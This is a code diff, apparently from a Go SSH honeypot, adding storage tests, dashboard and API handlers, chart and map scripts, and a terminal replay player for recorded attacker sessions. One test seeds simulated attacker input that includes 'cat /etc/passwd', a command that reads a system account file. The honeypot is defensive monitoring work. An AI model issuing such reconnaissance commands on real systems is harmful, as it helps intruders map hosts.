if stats.TotalAttempts != 5 {
t.Errorf("TotalAttempts = %d, want 5", stats.TotalAttempts)
}
})
t.Run("filter by username", func(t *testing.T) {
store := newStore(t)
seedChartData(t, store)
stats, err := store.GetFilteredDashboardStats(context.Background(), DashboardFilter{Username: "admin"})
if err != nil {
t.Fatalf("GetFilteredDashboardStats: %v", err)
}
if stats.TotalAttempts != 3 {
t.Errorf("TotalAttempts = %d, want 3", stats.TotalAttempts)
}
})
})
}
func TestGetFilteredTopUsernames(t *testing.T) {
testStores(t, func(t *testing.T, newStore storeFactory) {
store := newStore(t)
seedChartData(t, store)
// Filter by country CN should only show root.
entries, err := store.GetFilteredTopUsernames(context.Background(), 10, DashboardFilter{Country: "CN"})
if err != nil {
t.Fatalf("GetFilteredTopUsernames: %v", err)
}
if len(entries) != 1 {
t.Fatalf("len = %d, want 1", len(entries))
}
if entries[0].Value != "root" || entries[0].Count != 7 {
t.Errorf("entries[0] = %+v, want root/7", entries[0])
}
})
}
func TestGetRecentSessions(t *testing.T) {
testStores(t, func(t *testing.T, newStore storeFactory) {
t.Run("empty", func(t *testing.T) {
store := newStore(t)
sessions, err := store.GetRecentSessions(context.Background(), 10, false)
if err != nil {
t.Fatalf("GetRecentSessions: %v", err)
}
if len(sessions) != 0 {
t.Errorf("expected empty, got %d", len(sessions))
}
})
t.Run("all sessions", func(t *testing.T) {
store := newStore(t)
seedData(t, store)
sessions, err := store.GetRecentSessions(context.Background(), 10, false)
if err != nil {
t.Fatalf("GetRecentSessions: %v", err)
}
if len(sessions) != 2 {
t.Fatalf("len = %d, want 2", len(sessions))
}
})
t.Run("active only", func(t *testing.T) {
store := newStore(t)
seedData(t, store)
sessions, err := store.GetRecentSessions(context.Background(), 10, true)
if err != nil {
t.Fatalf("GetRecentSessions: %v", err)
}
if len(sessions) != 1 {
t.Fatalf("len = %d, want 1", len(sessions))
}
if sessions[0].DisconnectedAt != nil {
t.Error("active session should have nil DisconnectedAt")
}
})
t.Run("limit", func(t *testing.T) {
store := newStore(t)
seedData(t, store)
sessions, err := store.GetRecentSessions(context.Background(), 1, false)
if err != nil {
t.Fatalf("GetRecentSessions: %v", err)
}
if len(sessions) != 1 {
t.Fatalf("len = %d, want 1", len(sessions))
}
})
})
}
func TestInputBytes(t *testing.T) {
testStores(t, func(t *testing.T, newStore storeFactory) {
t.Run("counts only input direction", func(t *testing.T) {
store := newStore(t)
ctx := context.Background()
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "")
if err != nil {
t.Fatalf("CreateSession: %v", err)
}
now := time.Now().UTC()
events := []SessionEvent{
{SessionID: id, Timestamp: now, Direction: 0, Data: []byte("ls\n")}, // 3 bytes input
{SessionID: id, Timestamp: now.Add(100 * time.Millisecond), Direction: 1, Data: []byte("file1\nfile2\n")}, // 11 bytes output
{SessionID: id, Timestamp: now.Add(200 * time.Millisecond), Direction: 0, Data: []byte("pwd\n")}, // 4 bytes input
}
if err := store.AppendSessionEvents(ctx, events); err != nil {
t.Fatalf("AppendSessionEvents: %v", err)
}
sessions, err := store.GetRecentSessions(ctx, 10, false)
if err != nil {
t.Fatalf("GetRecentSessions: %v", err)
}
if len(sessions) != 1 {
t.Fatalf("len = %d, want 1", len(sessions))
}
// Only direction=0 data: "ls\n" (3) + "pwd\n" (4) = 7
if sessions[0].InputBytes != 7 {
t.Errorf("InputBytes = %d, want 7", sessions[0].InputBytes)
}
})
t.Run("zero when no events", func(t *testing.T) {
store := newStore(t)
ctx := context.Background()
_, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "")
if err != nil {
t.Fatalf("CreateSession: %v", err)
}
sessions, err := store.GetRecentSessions(ctx, 10, false)
if err != nil {
t.Fatalf("GetRecentSessions: %v", err)
}
if len(sessions) != 1 {
t.Fatalf("len = %d, want 1", len(sessions))
}
if sessions[0].InputBytes != 0 {
t.Errorf("InputBytes = %d, want 0", sessions[0].InputBytes)
}
})
})
}
func TestGetFilteredSessions(t *testing.T) {
testStores(t, func(t *testing.T, newStore storeFactory) {
t.Run("filter by human score", func(t *testing.T) {
store := newStore(t)
ctx := context.Background()
// Create two sessions, one with human score > 0.
id1, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "CN")
if err != nil {
t.Fatalf("CreateSession: %v", err)
}
if err := store.UpdateHumanScore(ctx, id1, 0.75); err != nil {
t.Fatalf("UpdateHumanScore: %v", err)
}
_, err = store.CreateSession(ctx, "10.0.0.2", "admin", "bash", "US")
if err != nil {
t.Fatalf("CreateSession: %v", err)
}
sessions, err := store.GetFilteredSessions(ctx, 50, false, DashboardFilter{HumanScoreAboveZero: true})
if err != nil {
t.Fatalf("GetFilteredSessions: %v", err)
}
if len(sessions) != 1 {
t.Fatalf("len = %d, want 1", len(sessions))
}
if sessions[0].ID != id1 {
t.Errorf("expected session %s, got %s", id1, sessions[0].ID)
}
})
t.Run("sort by input bytes", func(t *testing.T) {
store := newStore(t)
ctx := context.Background()
// Session with more input (created first).
id1, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "")
if err != nil {
t.Fatalf("CreateSession: %v", err)
}
now := time.Now().UTC()
if err := store.AppendSessionEvents(ctx, []SessionEvent{
{SessionID: id1, Timestamp: now, Direction: 0, Data: []byte("ls -la /tmp\n")},
{SessionID: id1, Timestamp: now.Add(time.Millisecond), Direction: 0, Data: []byte("cat /etc/passwd\n")},
}); err != nil {
t.Fatalf("AppendSessionEvents: %v", err)
}
// Session with less input (created after id1, so would be first by connected_at).
// Sleep >1s to ensure different RFC3339 timestamps in SQLite.
time.Sleep(1100 * time.Millisecond)
id2, err := store.CreateSession(ctx, "10.0.0.2", "admin", "bash", "")
if err != nil {
t.Fatalf("CreateSession: %v", err)
}
if err := store.AppendSessionEvents(ctx, []SessionEvent{
{SessionID: id2, Timestamp: now.Add(2 * time.Second), Direction: 0, Data: []byte("x\n")},
}); err != nil {
t.Fatalf("AppendSessionEvents: %v", err)
}
// Default sort (connected_at DESC) should show id2 first.
sessions, err := store.GetFilteredSessions(ctx, 50, false, DashboardFilter{})
if err != nil {
t.Fatalf("GetFilteredSessions: %v", err)
}
if len(sessions) != 2 {
t.Fatalf("len = %d, want 2", len(sessions))
}
if sessions[0].ID != id2 {
t.Errorf("default sort: expected %s first, got %s", id2, sessions[0].ID)
}
// Sort by input_bytes should show id1 first (more input).
sessions, err = store.GetFilteredSessions(ctx, 50, false, DashboardFilter{SortBy: "input_bytes"})
if err != nil {
t.Fatalf("GetFilteredSessions: %v", err)
}
if len(sessions) != 2 {
t.Fatalf("len = %d, want 2", len(sessions))
}
if sessions[0].ID != id1 {
t.Errorf("input_bytes sort: expected %s first, got %s", id1, sessions[0].ID)
}
})
t.Run("combined filters", func(t *testing.T) {
store := newStore(t)
ctx := context.Background()
id1, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "CN")
if err != nil {
t.Fatalf("CreateSession: %v", err)
}
if err := store.UpdateHumanScore(ctx, id1, 0.5); err != nil {
t.Fatalf("UpdateHumanScore: %v", err)
}
// Different country, also has score.
id2, err := store.CreateSession(ctx, "10.0.0.2", "admin", "bash", "US")
if err != nil {
t.Fatalf("CreateSession: %v", err)
}
if err := store.UpdateHumanScore(ctx, id2, 0.8); err != nil {
t.Fatalf("UpdateHumanScore: %v", err)
}
// Same country CN but no score.
_, err = store.CreateSession(ctx, "10.0.0.3", "test", "bash", "CN")
if err != nil {
t.Fatalf("CreateSession: %v", err)
}
// Filter: CN + human score > 0 -> only id1.
sessions, err := store.GetFilteredSessions(ctx, 50, false, DashboardFilter{
Country: "CN",
HumanScoreAboveZero: true,
})
if err != nil {
t.Fatalf("GetFilteredSessions: %v", err)
}
if len(sessions) != 1 {
t.Fatalf("len = %d, want 1", len(sessions))
}
if sessions[0].ID != id1 {
t.Errorf("expected session %s, got %s", id1, sessions[0].ID)
}
})
})
}

441
internal/web/handlers.go Normal file
View File

@@ -0,0 +1,441 @@
package web
import (
"context"
"encoding/base64"
"encoding/json"
"net/http"
"strconv"
"time"
"code.t-juice.club/torjus/oubliette/internal/storage"
)
// dbContext returns a context detached from the HTTP request lifecycle with a
// 30-second timeout. This prevents HTMX polling from canceling in-flight DB
// queries when the browser aborts the previous XHR.
func dbContext(r *http.Request) (context.Context, context.CancelFunc) {
return context.WithTimeout(context.WithoutCancel(r.Context()), 30*time.Second)
}
type dashboardData struct {
Stats *storage.DashboardStats
TopUsernames []storage.TopEntry
TopPasswords []storage.TopEntry
TopIPs []storage.TopEntry
TopCountries []storage.TopEntry
TopExecCommands []storage.TopEntry
ActiveSessions []storage.Session
RecentSessions []storage.Session
}
func (s *Server) handleDashboard(w http.ResponseWriter, r *http.Request) {
ctx, cancel := dbContext(r)
defer cancel()
stats, err := s.store.GetDashboardStats(ctx)
if err != nil {
s.logger.Error("failed to get dashboard stats", "err", err)
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
return
}
topUsernames, err := s.store.GetTopUsernames(ctx, 10)
if err != nil {
s.logger.Error("failed to get top usernames", "err", err)
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
return
}
topPasswords, err := s.store.GetTopPasswords(ctx, 10)
if err != nil {
s.logger.Error("failed to get top passwords", "err", err)
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
return
}
topIPs, err := s.store.GetTopIPs(ctx, 10)
if err != nil {
s.logger.Error("failed to get top IPs", "err", err)
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
return
}
topCountries, err := s.store.GetTopCountries(ctx, 10)
if err != nil {
s.logger.Error("failed to get top countries", "err", err)
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
return
}
topExecCommands, err := s.store.GetTopExecCommands(ctx, 10)
if err != nil {
s.logger.Error("failed to get top exec commands", "err", err)
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
return
}
activeSessions, err := s.store.GetRecentSessions(ctx, 50, true)
if err != nil {
s.logger.Error("failed to get active sessions", "err", err)
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
return
}
recentSessions, err := s.store.GetRecentSessions(ctx, 50, false)
if err != nil {
s.logger.Error("failed to get recent sessions", "err", err)
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
return
}
data := dashboardData{
Stats: stats,
TopUsernames: topUsernames,
TopPasswords: topPasswords,
TopIPs: topIPs,
TopCountries: topCountries,
TopExecCommands: topExecCommands,
ActiveSessions: activeSessions,
RecentSessions: recentSessions,
}
w.Header().Set("Content-Type", "text/html; charset=utf-8")
if err := s.tmpl.dashboard.ExecuteTemplate(w, "layout.html", data); err != nil {
s.logger.Error("failed to render dashboard", "err", err)
}
}
func (s *Server) handleFragmentStats(w http.ResponseWriter, r *http.Request) {
ctx, cancel := dbContext(r)
defer cancel()
stats, err := s.store.GetDashboardStats(ctx)
if err != nil {
s.logger.Error("failed to get dashboard stats", "err", err)
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "text/html; charset=utf-8")
if err := s.tmpl.dashboard.ExecuteTemplate(w, "stats", stats); err != nil {
s.logger.Error("failed to render stats fragment", "err", err)
}
}
func (s *Server) handleFragmentActiveSessions(w http.ResponseWriter, r *http.Request) {
ctx, cancel := dbContext(r)
defer cancel()
sessions, err := s.store.GetRecentSessions(ctx, 50, true)
if err != nil {
s.logger.Error("failed to get active sessions", "err", err)
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "text/html; charset=utf-8")
if err := s.tmpl.dashboard.ExecuteTemplate(w, "active_sessions", sessions); err != nil {
s.logger.Error("failed to render active sessions fragment", "err", err)
}
}
func (s *Server) handleFragmentRecentSessions(w http.ResponseWriter, r *http.Request) {
ctx, cancel := dbContext(r)
defer cancel()
f := parseDashboardFilter(r)
sessions, err := s.store.GetFilteredSessions(ctx, 50, false, f)
if err != nil {
s.logger.Error("failed to get filtered sessions", "err", err)
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "text/html; charset=utf-8")
if err := s.tmpl.dashboard.ExecuteTemplate(w, "recent_sessions", sessions); err != nil {
s.logger.Error("failed to render recent sessions fragment", "err", err)
}
}
type sessionDetailData struct {
Session *storage.Session
Logs []storage.SessionLog
EventCount int
}
func (s *Server) handleSessionDetail(w http.ResponseWriter, r *http.Request) {
ctx, cancel := dbContext(r)
defer cancel()
sessionID := r.PathValue("id")
session, err := s.store.GetSession(ctx, sessionID)
if err != nil {
s.logger.Error("failed to get session", "err", err)
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
return
}
if session == nil {
http.NotFound(w, r)
return
}
logs, err := s.store.GetSessionLogs(ctx, sessionID)
if err != nil {
s.logger.Error("failed to get session logs", "err", err)
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
return
}
events, err := s.store.GetSessionEvents(ctx, sessionID)
if err != nil {
s.logger.Error("failed to get session events", "err", err)
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
return
}
data := sessionDetailData{
Session: session,
Logs: logs,
EventCount: len(events),
}
w.Header().Set("Content-Type", "text/html; charset=utf-8")
if err := s.tmpl.sessionDetail.ExecuteTemplate(w, "layout.html", data); err != nil {
s.logger.Error("failed to render session detail", "err", err)
}
}
type apiEvent struct {
T int64 `json:"t"`
D int `json:"d"`
Data string `json:"data"`
}
type apiEventsResponse struct {
Events []apiEvent `json:"events"`
}
// parseDateParam parses a "YYYY-MM-DD" query parameter into a *time.Time.
func parseDateParam(r *http.Request, name string) *time.Time {
v := r.URL.Query().Get(name)
if v == "" {
return nil
}
t, err := time.Parse("2006-01-02", v)
if err != nil {
return nil
}
// For "until" dates, set to end of day.
if name == "until" {
t = t.Add(24*time.Hour - time.Second)
}
return &t
}
func parseDashboardFilter(r *http.Request) storage.DashboardFilter {
return storage.DashboardFilter{
Since: parseDateParam(r, "since"),
Until: parseDateParam(r, "until"),
IP: r.URL.Query().Get("ip"),
Country: r.URL.Query().Get("country"),
Username: r.URL.Query().Get("username"),
HumanScoreAboveZero: r.URL.Query().Get("human_score") == "1",
SortBy: r.URL.Query().Get("sort"),
}
}
type apiTimeSeriesPoint struct {
Date string `json:"date"`
Count int64 `json:"count"`
}
type apiAttemptsOverTimeResponse struct {
Points []apiTimeSeriesPoint `json:"points"`
}
func (s *Server) handleAPIAttemptsOverTime(w http.ResponseWriter, r *http.Request) {
days := 30
if v := r.URL.Query().Get("days"); v != "" {
if d, err := strconv.Atoi(v); err == nil && d > 0 && d <= 365 {
days = d
}
}
since := parseDateParam(r, "since")
until := parseDateParam(r, "until")
ctx, cancel := dbContext(r)
defer cancel()
points, err := s.store.GetAttemptsOverTime(ctx, days, since, until)
if err != nil {
s.logger.Error("failed to get attempts over time", "err", err)
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
return
}
resp := apiAttemptsOverTimeResponse{Points: make([]apiTimeSeriesPoint, len(points))}
for i, p := range points {
resp.Points[i] = apiTimeSeriesPoint{
Date: p.Timestamp.Format("2006-01-02"),
Count: p.Count,
}
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(resp); err != nil {
s.logger.Error("failed to encode attempts over time", "err", err)
}
}
type apiHourlyCount struct {
Hour int `json:"hour"`
Count int64 `json:"count"`
}
type apiHourlyPatternResponse struct {
Hours []apiHourlyCount `json:"hours"`
}
func (s *Server) handleAPIHourlyPattern(w http.ResponseWriter, r *http.Request) {
ctx, cancel := dbContext(r)
defer cancel()
since := parseDateParam(r, "since")
until := parseDateParam(r, "until")
counts, err := s.store.GetHourlyPattern(ctx, since, until)
if err != nil {
s.logger.Error("failed to get hourly pattern", "err", err)
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
return
}
resp := apiHourlyPatternResponse{Hours: make([]apiHourlyCount, len(counts))}
for i, c := range counts {
resp.Hours[i] = apiHourlyCount{Hour: c.Hour, Count: c.Count}
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(resp); err != nil {
s.logger.Error("failed to encode hourly pattern", "err", err)
}
}
type apiCountryCount struct {
Country string `json:"country"`
Count int64 `json:"count"`
}
type apiCountryStatsResponse struct {
Countries []apiCountryCount `json:"countries"`
}
func (s *Server) handleAPICountryStats(w http.ResponseWriter, r *http.Request) {
ctx, cancel := dbContext(r)
defer cancel()
counts, err := s.store.GetCountryStats(ctx)
if err != nil {
s.logger.Error("failed to get country stats", "err", err)
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
return
}
resp := apiCountryStatsResponse{Countries: make([]apiCountryCount, len(counts))}
for i, c := range counts {
resp.Countries[i] = apiCountryCount{Country: c.Country, Count: c.Count}
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(resp); err != nil {
s.logger.Error("failed to encode country stats", "err", err)
}
}
func (s *Server) handleFragmentDashboardContent(w http.ResponseWriter, r *http.Request) {
ctx, cancel := dbContext(r)
defer cancel()
f := parseDashboardFilter(r)
stats, err := s.store.GetFilteredDashboardStats(ctx, f)
if err != nil {
s.logger.Error("failed to get filtered stats", "err", err)
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
return
}
topUsernames, err := s.store.GetFilteredTopUsernames(ctx, 10, f)
if err != nil {
s.logger.Error("failed to get filtered top usernames", "err", err)
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
return
}
topPasswords, err := s.store.GetFilteredTopPasswords(ctx, 10, f)
if err != nil {
s.logger.Error("failed to get filtered top passwords", "err", err)
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
return
}
topIPs, err := s.store.GetFilteredTopIPs(ctx, 10, f)
if err != nil {
s.logger.Error("failed to get filtered top IPs", "err", err)
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
return
}
topCountries, err := s.store.GetFilteredTopCountries(ctx, 10, f)
if err != nil {
s.logger.Error("failed to get filtered top countries", "err", err)
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
return
}
data := dashboardData{
Stats: stats,
TopUsernames: topUsernames,
TopPasswords: topPasswords,
TopIPs: topIPs,
TopCountries: topCountries,
}
w.Header().Set("Content-Type", "text/html; charset=utf-8")
if err := s.tmpl.dashboard.ExecuteTemplate(w, "dashboard_content", data); err != nil {
s.logger.Error("failed to render dashboard content fragment", "err", err)
}
}
func (s *Server) handleAPISessionEvents(w http.ResponseWriter, r *http.Request) {
ctx, cancel := dbContext(r)
defer cancel()
sessionID := r.PathValue("id")
events, err := s.store.GetSessionEvents(ctx, sessionID)
if err != nil {
s.logger.Error("failed to get session events", "err", err)
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
return
}
resp := apiEventsResponse{Events: make([]apiEvent, len(events))}
var baseTime int64
for i, e := range events {
ms := e.Timestamp.UnixMilli()
if i == 0 {
baseTime = ms
}
resp.Events[i] = apiEvent{
T: ms - baseTime,
D: e.Direction,
Data: base64.StdEncoding.EncodeToString(e.Data),
}
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(resp); err != nil {
s.logger.Error("failed to encode session events", "err", err)
}
}

14
internal/web/static/chart.min.js vendored Normal file

File diff suppressed because one or more lines are too long

View File

@@ -0,0 +1,275 @@
(function() {
'use strict';
// Chart.js theme for Pico dark mode
Chart.defaults.color = '#b0b0b8';
Chart.defaults.borderColor = '#3a3a4a';
var attemptsChart = null;
var hourlyChart = null;
function getFilterParams() {
var form = document.getElementById('filter-form');
if (!form) return '';
var params = new URLSearchParams();
var since = form.elements['since'].value;
var until = form.elements['until'].value;
if (since) params.set('since', since);
if (until) params.set('until', until);
var humanScore = form.elements['human_score'];
if (humanScore && humanScore.checked) params.set('human_score', '1');
var sortBy = form.elements['sort'];
if (sortBy && sortBy.value) params.set('sort', sortBy.value);
return params.toString();
}
function initAttemptsChart() {
var canvas = document.getElementById('chart-attempts');
if (!canvas) return;
var ctx = canvas.getContext('2d');
var qs = getFilterParams();
var url = '/api/charts/attempts-over-time' + (qs ? '?' + qs : '');
fetch(url)
.then(function(r) { return r.json(); })
.then(function(data) {
var labels = data.points.map(function(p) { return p.date; });
var values = data.points.map(function(p) { return p.count; });
if (attemptsChart) {
attemptsChart.data.labels = labels;
attemptsChart.data.datasets[0].data = values;
attemptsChart.update();
return;
}
attemptsChart = new Chart(ctx, {
type: 'line',
data: {
labels: labels,
datasets: [{
label: 'Attempts',
data: values,
borderColor: '#6366f1',
backgroundColor: 'rgba(99, 102, 241, 0.1)',
fill: true,
tension: 0.3,
pointRadius: 2
}]
},
options: {
responsive: true,
maintainAspectRatio: true,
plugins: { legend: { display: false } },
scales: {
x: { grid: { display: false } },
y: { beginAtZero: true }
}
}
});
});
}
function initHourlyChart() {
var canvas = document.getElementById('chart-hourly');
if (!canvas) return;
var ctx = canvas.getContext('2d');
var qs = getFilterParams();
var url = '/api/charts/hourly-pattern' + (qs ? '?' + qs : '');
fetch(url)
.then(function(r) { return r.json(); })
.then(function(data) {
// Fill all 24 hours, defaulting to 0
var hourMap = {};
data.hours.forEach(function(h) { hourMap[h.hour] = h.count; });
var labels = [];
var values = [];
for (var i = 0; i < 24; i++) {
labels.push(i + ':00');
values.push(hourMap[i] || 0);
}
if (hourlyChart) {
hourlyChart.data.labels = labels;
hourlyChart.data.datasets[0].data = values;
hourlyChart.update();
return;
}
hourlyChart = new Chart(ctx, {
type: 'bar',
data: {
labels: labels,
datasets: [{
label: 'Attempts',
data: values,
backgroundColor: 'rgba(99, 102, 241, 0.6)',
borderColor: '#6366f1',
borderWidth: 1
}]
},
options: {
responsive: true,
maintainAspectRatio: true,
plugins: { legend: { display: false } },
scales: {
x: { grid: { display: false } },
y: { beginAtZero: true }
}
}
});
});
}
function initWorldMap() {
var container = document.getElementById('world-map');
if (!container) return;
fetch('/static/world.svg')
.then(function(r) { return r.text(); })
.then(function(svgText) {
container.innerHTML = svgText;
fetch('/api/charts/country-stats')
.then(function(r) { return r.json(); })
.then(function(data) {
colorMap(container, data.countries);
});
});
}
function colorMap(container, countries) {
if (!countries || countries.length === 0) return;
var maxCount = countries[0].count; // already sorted DESC
var logMax = Math.log(maxCount + 1);
// Build lookup
var lookup = {};
countries.forEach(function(c) {
lookup[c.country.toLowerCase()] = c.count;
});
// Create tooltip element
var tooltip = document.createElement('div');
tooltip.id = 'map-tooltip';
tooltip.style.cssText = 'position:fixed;display:none;background:#1a1a2e;color:#e0e0e8;padding:4px 8px;border-radius:4px;font-size:13px;pointer-events:none;z-index:1000;border:1px solid #3a3a4a;';
document.body.appendChild(tooltip);
var svg = container.querySelector('svg');
if (!svg) return;
// Remove SVG title to prevent browser native tooltip
var svgTitle = svg.querySelector('title');
if (svgTitle) svgTitle.remove();
// Select both <path id="xx"> and <g id="xx"> country elements
var elements = svg.querySelectorAll('path[id], g[id]');
elements.forEach(function(el) {
var id = el.id.toLowerCase();
if (id.charAt(0) === '_') return; // skip non-country paths
var count = lookup[id];
if (count) {
var intensity = Math.log(count + 1) / logMax;
var r = Math.round(30 + intensity * 69); // 30 -> 99
var g = Math.round(30 + intensity * 72); // 30 -> 102
var b = Math.round(62 + intensity * 179); // 62 -> 241
var color = 'rgb(' + r + ',' + g + ',' + b + ')';
// For <g> elements, color child paths; for <path>, color directly
if (el.tagName.toLowerCase() === 'g') {
el.querySelectorAll('path').forEach(function(p) {
p.style.fill = color;
});
} else {
el.style.fill = color;
}
}
el.addEventListener('mouseenter', function(e) {
var cc = id.toUpperCase();
var n = lookup[id] || 0;
tooltip.textContent = cc + ': ' + n.toLocaleString() + ' attempts';
tooltip.style.display = 'block';
});
el.addEventListener('mousemove', function(e) {
tooltip.style.left = (e.clientX + 12) + 'px';
tooltip.style.top = (e.clientY - 10) + 'px';
});
el.addEventListener('mouseleave', function() {
tooltip.style.display = 'none';
});
el.addEventListener('click', function() {
var input = document.querySelector('#filter-form input[name="country"]');
if (input) {
input.value = id.toUpperCase();
applyFilters();
}
});
el.style.cursor = 'pointer';
});
}
function applyFilters() {
// Re-fetch charts with filter params
initAttemptsChart();
initHourlyChart();
// Re-fetch dashboard content via htmx
var form = document.getElementById('filter-form');
if (!form) return;
var params = new URLSearchParams();
['since', 'until', 'ip', 'country', 'username'].forEach(function(name) {
var val = form.elements[name].value;
if (val) params.set(name, val);
});
var humanScore = form.elements['human_score'];
if (humanScore && humanScore.checked) params.set('human_score', '1');
var sortBy = form.elements['sort'];
if (sortBy && sortBy.value) params.set('sort', sortBy.value);
var target = document.getElementById('dashboard-content');
if (target) {
var url = '/fragments/dashboard-content?' + params.toString();
htmx.ajax('GET', url, {target: '#dashboard-content', swap: 'innerHTML'});
}
// Server-side filter for recent sessions table
var sessionsUrl = '/fragments/recent-sessions?' + params.toString();
htmx.ajax('GET', sessionsUrl, {target: '#recent-sessions-table tbody', swap: 'innerHTML'});
}
window.clearFilters = function() {
var form = document.getElementById('filter-form');
if (form) {
form.reset();
applyFilters();
}
};
window.applyFilters = applyFilters;
// Initialize on DOM ready
document.addEventListener('DOMContentLoaded', function() {
initAttemptsChart();
initHourlyChart();
initWorldMap();
var form = document.getElementById('filter-form');
if (form) {
form.addEventListener('submit', function(e) {
e.preventDefault();
applyFilters();
});
}
});
})();

1
internal/web/static/htmx.min.js vendored Normal file

File diff suppressed because one or more lines are too long

4
internal/web/static/pico.min.css vendored Normal file

File diff suppressed because one or more lines are too long

View File

@@ -0,0 +1,83 @@
// ReplayPlayer drives xterm.js playback of recorded session events.
function ReplayPlayer(containerId, sessionId) {
this.terminal = new Terminal({
cols: 80,
rows: 24,
convertEol: true,
disableStdin: true,
theme: {
background: '#000000',
foreground: '#ffffff'
}
});
this.terminal.open(document.getElementById(containerId));
this.sessionId = sessionId;
this.events = [];
this.index = 0;
this.speed = 1;
this.timers = [];
this.playing = false;
// Fetch events immediately.
var self = this;
fetch('/api/sessions/' + sessionId + '/events')
.then(function(r) { return r.json(); })
.then(function(data) {
self.events = data.events || [];
});
}
ReplayPlayer.prototype.play = function() {
if (this.playing) return;
if (this.events.length === 0) return;
this.playing = true;
this._schedule();
};
ReplayPlayer.prototype.pause = function() {
this.playing = false;
for (var i = 0; i < this.timers.length; i++) {
clearTimeout(this.timers[i]);
}
this.timers = [];
};
ReplayPlayer.prototype.reset = function() {
this.pause();
this.index = 0;
this.terminal.reset();
};
ReplayPlayer.prototype.setSpeed = function(speed) {
this.speed = speed;
if (this.playing) {
this.pause();
this.play();
}
};
ReplayPlayer.prototype._schedule = function() {
var self = this;
var baseT = this.index < this.events.length ? this.events[this.index].t : 0;
for (var i = this.index; i < this.events.length; i++) {
(function(idx) {
var evt = self.events[idx];
var delay = (evt.t - baseT) / self.speed;
var timer = setTimeout(function() {
if (!self.playing) return;
// Only write output events (d=1) to terminal; input is echoed in output.
if (evt.d === 1) {
var raw = atob(evt.data);
self.terminal.write(raw);
}
self.index = idx + 1;
if (self.index >= self.events.length) {
self.playing = false;
}
}, delay);
self.timers.push(timer);
})(i);
}
};

File diff suppressed because one or more lines are too long

After

Width:  |  Height:  |  Size: 55 KiB

View File

@@ -0,0 +1,209 @@
/**
* Copyright (c) 2014 The xterm.js authors. All rights reserved.
* Copyright (c) 2012-2013, Christopher Jeffrey (MIT License)
* https://github.com/chjj/term.js
* @license MIT
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*
* Originally forked from (with the author's permission):
* Fabrice Bellard's javascript vt100 for jslinux:
* http://bellard.org/jslinux/
* Copyright (c) 2011 Fabrice Bellard
* The original design remains. The terminal itself
* has been extended to include xterm CSI codes, among
* other features.
*/
/**
* Default styles for xterm.js
*/
.xterm {
cursor: text;
position: relative;
user-select: none;
-ms-user-select: none;
-webkit-user-select: none;
}
.xterm.focus,
.xterm:focus {
outline: none;
}
.xterm .xterm-helpers {
position: absolute;
top: 0;
/**
* The z-index of the helpers must be higher than the canvases in order for
* IMEs to appear on top.
*/
z-index: 5;
}
.xterm .xterm-helper-textarea {
padding: 0;
border: 0;
margin: 0;
/* Move textarea out of the screen to the far left, so that the cursor is not visible */
position: absolute;
opacity: 0;
left: -9999em;
top: 0;
width: 0;
height: 0;
z-index: -5;
/** Prevent wrapping so the IME appears against the textarea at the correct position */
white-space: nowrap;
overflow: hidden;
resize: none;
}
.xterm .composition-view {
/* TODO: Composition position got messed up somewhere */
background: #000;
color: #FFF;
display: none;
position: absolute;
white-space: nowrap;
z-index: 1;
}
.xterm .composition-view.active {
display: block;
}
.xterm .xterm-viewport {
/* On OS X this is required in order for the scroll bar to appear fully opaque */
background-color: #000;
overflow-y: scroll;
cursor: default;
position: absolute;
right: 0;
left: 0;
top: 0;
bottom: 0;
}
.xterm .xterm-screen {
position: relative;
}
.xterm .xterm-screen canvas {
position: absolute;
left: 0;
top: 0;
}
.xterm .xterm-scroll-area {
visibility: hidden;
}
.xterm-char-measure-element {
display: inline-block;
visibility: hidden;
position: absolute;
top: 0;
left: -9999em;
line-height: normal;
